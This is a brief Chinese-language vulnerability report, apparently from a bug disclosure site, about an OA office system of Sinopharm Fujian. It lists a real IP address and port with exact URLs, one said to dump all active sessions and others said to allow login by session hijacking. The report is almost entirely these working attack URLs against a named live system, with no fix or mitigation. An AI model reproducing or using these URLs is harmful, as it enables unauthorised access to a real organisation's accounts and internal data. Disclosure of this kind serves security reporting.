漏洞细节
多处敏感信息泄露
国药福建OA系统:http://218.5.65.215:8080/yyoa/
session泄露:
http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll
session劫持登陆:
http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp
http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1